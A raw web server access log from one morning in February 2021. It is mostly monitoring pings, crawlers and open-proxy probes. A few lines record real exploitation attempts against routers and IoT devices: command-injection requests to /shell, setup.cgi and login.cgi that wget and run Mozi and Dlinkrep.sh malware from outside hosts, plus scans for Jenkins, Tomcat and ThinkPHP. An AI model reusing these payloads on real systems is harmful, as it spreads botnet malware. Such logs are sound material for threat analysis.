27.224.137.219 - - [06/Feb/2021:06:50:32 +0100] "HEAD http://110.242.68.4/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
49.118.203.147 - - [06/Feb/2021:06:50:34 +0100] "CONNECT www.baidu.com:443 HTTP/1.1" 405 343 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
219.140.119.55 - - [06/Feb/2021:06:50:34 +0100] "GET http://dongtaiwang.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
183.191.122.216 - - [06/Feb/2021:06:50:38 +0100] "CONNECT cn.bing.com:443 HTTP/1.1" 405 341 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
123.145.5.76 - - [06/Feb/2021:06:50:40 +0100] "GET http://www.minghui.org/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
119.118.18.161 - - [06/Feb/2021:06:50:40 +0100] "GET http://a.189.cn/JJ6CvF HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
220.200.160.108 - - [06/Feb/2021:06:50:41 +0100] "CONNECT www.so.com:443 HTTP/1.1" 405 340 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
171.36.245.234 - - [06/Feb/2021:06:50:42 +0100] "GET http://www.epochtimes.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
112.117.19.76 - - [06/Feb/2021:06:50:42 +0100] "GET http://www.soso.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
175.184.167.238 - - [06/Feb/2021:06:50:42 +0100] "CONNECT www.voanews.com:443 HTTP/1.1" 405 345 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
118.81.12.179 - - [06/Feb/2021:06:50:42 +0100] "GET http://www.wujieliulan.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
2.183.107.32 - - [06/Feb/2021:06:55:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
117.202.65.216 - - [06/Feb/2021:06:58:48 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.202.65.216:58373/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
212.91.246.72 - - [06/Feb/2021:07:00:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:01:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:02:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.129.247 - - [06/Feb/2021:07:02:30 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [06/Feb/2021:07:03:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:04:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:05:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:06:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:07:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:08:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.129.247 - - [06/Feb/2021:07:08:35 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [06/Feb/2021:07:09:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:10:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:11:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:12:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:13:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:14:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
190.94.3.227 - - [06/Feb/2021:07:15:15 +0100] "GET /login HTTP/1.0" 404 306 "-" "-"
190.94.3.227 - - [06/Feb/2021:07:15:15 +0100] "GET /jenkins/login HTTP/1.0" 404 314 "-" "-"
190.94.3.227 - - [06/Feb/2021:07:15:15 +0100] "GET /manager/html HTTP/1.0" 404 313 "-" "-"
212.91.246.72 - - [06/Feb/2021:07:15:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.118.101.54 - - [06/Feb/2021:07:15:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
188.166.216.75 - - [06/Feb/2021:07:16:12 +0100] "GET /login HTTP/1.0" 404 306 "-" "-"
188.166.216.75 - - [06/Feb/2021:07:16:12 +0100] "GET /jenkins/login HTTP/1.0" 404 314 "-" "-"
188.166.216.75 - - [06/Feb/2021:07:16:13 +0100] "GET /manager/html HTTP/1.0" 404 313 "-" "-"
212.91.246.72 - - [06/Feb/2021:07:16:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:17:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.129.247 - - [06/Feb/2021:07:18:23 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [06/Feb/2021:07:18:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:19:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:20:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:21:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.172.110.208 - - [06/Feb/2021:07:22:15 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0"
185.224.129.247 - - [06/Feb/2021:07:22:25 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [06/Feb/2021:07:22:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.162.119.197 - - [06/Feb/2021:07:23:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "HTTP Banner Detection (https://security.ipip.net)"
212.91.246.72 - - [06/Feb/2021:07:23:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:24:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:25:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:26:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:27:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:28:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.129.64.215 - - [06/Feb/2021:07:29:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
212.91.246.72 - - [06/Feb/2021:07:29:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
111.92.80.136 - - [06/Feb/2021:07:29:51 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://111.92.80.136:58005/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
212.91.246.72 - - [06/Feb/2021:07:30:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:31:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:32:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:33:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:34:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:35:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
37.202.129.142 - - [06/Feb/2021:07:36:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [06/Feb/2021:07:36:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:37:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:38:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:39:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.220.101.15 - - [06/Feb/2021:07:40:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
212.91.246.72 - - [06/Feb/2021:07:40:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:41:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:42:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.75.213.16 - - [06/Feb/2021:07:43:01 +0100] "GET /TP/public/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.75.213.16 - - [06/Feb/2021:07:43:02 +0100] "GET /TP/index.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.75.213.16 - - [06/Feb/2021:07:43:02 +0100] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.75.213.16 - - [06/Feb/2021:07:43:03 +0100] "GET /html/public/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.75.213.16 - - [06/Feb/2021:07:43:03 +0100] "GET /public/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.75.213.16 - - [06/Feb/2021:07:43:04 +0100] "GET /TP/html/public/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.75.213.16 - - [06/Feb/2021:07:43:04 +0100] "GET /elrekt.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.75.213.16 - - [06/Feb/2021:07:43:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
212.91.246.72 - - [06/Feb/2021:07:43:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:44:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:45:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:46:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.161.57 - - [06/Feb/2021:07:46:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
212.91.246.72 - - [06/Feb/2021:07:47:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:48:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:49:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.220.100.240 - - [06/Feb/2021:07:49:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01"
212.91.246.72 - - [06/Feb/2021:07:50:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:51:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:52:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:53:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:54:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.237.113.242 - - [06/Feb/2021:07:54:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [06/Feb/2021:07:55:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:56:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:57:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.55.39.32 - - [06/Feb/2021:07:58:02 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.139 - - [06/Feb/2021:07:58:04 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
212.91.246.72 - - [06/Feb/2021:07:58:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:07:59:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:00:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:01:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:02:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:03:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:04:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:05:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.112.35.14 - - [06/Feb/2021:08:05:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [06/Feb/2021:08:06:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:07:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:08:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:09:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:10:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:11:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:12:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:13:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:14:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:15:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:16:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:17:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:18:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.153.101.40 - - [06/Feb/2021:08:18:49 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [06/Feb/2021:08:19:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:20:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
218.62.121.205 - - [06/Feb/2021:08:20:34 +0100] "GET /login HTTP/1.0" 404 306 "-" "-"
218.62.121.205 - - [06/Feb/2021:08:20:34 +0100] "GET /jenkins/login HTTP/1.0" 404 314 "-" "-"
218.62.121.205 - - [06/Feb/2021:08:20:35 +0100] "GET /manager/html HTTP/1.0" 404 313 "-" "-"
218.62.121.205 - - [06/Feb/2021:08:20:36 +0100] "GET /wp-login.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
212.91.246.72 - - [06/Feb/2021:08:21:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:22:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:23:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:24:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:25:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:26:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:27:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:28:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:29:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:30:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
150.255.4.85 - - [06/Feb/2021:08:31:09 +0100] "HEAD http://110.242.68.4/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.01732016 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
180.95.238.54 - - [06/Feb/2021:08:31:11 +0100] "GET http://www.minghui.org/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
27.224.136.63 - - [06/Feb/2021:08:31:12 +0100] "GET http://www.wujieliulan.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
182.138.137.211 - - [06/Feb/2021:08:31:12 +0100] "GET http://www.rfa.org/english/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
124.90.48.18 - - [06/Feb/2021:08:31:13 +0100] "GET http://www.soso.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
124.90.53.177 - - [06/Feb/2021:08:31:13 +0100] "CONNECT www.so.com:443 HTTP/1.1" 405 340 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
60.13.7.234 - - [06/Feb/2021:08:31:13 +0100] "CONNECT www.baidu.com:443 HTTP/1.1" 405 343 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
110.83.32.215 - - [06/Feb/2021:08:31:14 +0100] "GET http://dongtaiwang.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
